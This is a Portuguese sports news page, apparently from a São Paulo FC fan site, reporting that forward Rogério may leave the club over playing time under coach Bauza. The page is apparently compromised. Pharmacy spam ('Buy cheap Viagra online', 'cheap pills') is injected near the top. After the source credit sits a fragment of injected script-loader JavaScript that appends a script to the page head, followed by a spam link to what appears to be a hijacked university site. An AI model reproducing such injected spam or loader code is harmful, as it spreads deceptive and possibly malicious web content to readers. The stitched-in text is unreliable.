Destaque

Rogério está de saída do São Paulo

Buy cheap Viagra online

cheap pills

O atacante Rogério não passa por um bom momento no São Paulo e pode deixar o clube. Ele interessa ao Sport, que já fez contato para saber da possibilidade de uma negociação. A diretoria do Tricolor não gostaria de liberar o atacante, mas seu comportamento nos últimos dias pode culminar na saída.

Insatisfeito por não ser utilizado como gostaria pelo técnico Edgardo Bauza, e, com o interesse do Sport, tem forçado uma situação para pressionar o clube a liberá-lo. Por conta disso, ele foi afastado da derrota do último sábado para o Atlético-PR no Morumbi – o atacante nem constou na lista de relacionados. A ideia é que ele repense sua atitude e volte mais comprometido a lutar por espaço. Caso a situação não seja contornada, ele deve ser liberado.

– Esperamos que ele resolva seus problemas pessoais, porque é um jogador importante e queremos ficar com ele. Mas essas coisas podem acontecer no futebol (negociação) e há clubes interessados – disse o presidente Carlos Augusto de Barros e Silva.

Rogério virou uma espécie de talismã da torcida do São Paulo, mas ainda não conquistou o técnico Bauza. Primeiro que ele reclamou por não ser escalado na ponta, onde prefere atuar, enquanto o argentino acredita que ele rende melhor pelo meio. Foi assim que ele entrou no segundo tempo e marcou o gol do empate contra o Coritiba, por 1 a 1, fora de casa, pelo Campeonato Brasileiro.


O camisa 17 tem 25 anos e contrato com o São Paulo até setembro de 2018. E sua concorrência vai aumentar depois da participação do Peru na Copa América, já que o São Paulo contratou o meia-atacante Christian Cueva, que estava no Toluca (MEX). Ele chega indicado por Bauza e com a moral de ser o camisa 10 de sua seleção.

Fonte: LanceNetd.getElementsByTagName(‘head’)[0].appendChild(s); acquire cheat medications no rx – http://shandychris.mhs.narotama.ac.id/2016/11/30/acquire-cheat-medications-no-rx/

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Destaque

Mais em Destaque

Petros e Militão não treinam, mas estão confirmados no jogo de quarta

saopauloadmin16 de outubro de 2017

Em rede social, Lucas pede para Kaká voltar ao São Paulo

saopauloadmin16 de outubro de 2017

Dorival tem pilares para reerguer São Paulo

saopauloadmin16 de outubro de 2017

São Paulo aposta em Kaká para fechar com Adidas ou New Balance

saopauloadmin16 de outubro de 2017

Pratto finda jejum e celebra vitória do São Paulo: “Tirou um peso”

saopauloadmin15 de outubro de 2017

Atuação de camisa 10!

saopauloadmin15 de outubro de 2017

Dorival analisa virada e elogia torcida tricolor

saopauloadmin15 de outubro de 2017

São Paulo é derrotado pelo Atlético-MG fora de casa

saopauloadmin12 de outubro de 2017

São Paulo trabalha pênaltis e bola parada em treino antes de viajar

saopauloadmin10 de outubro de 2017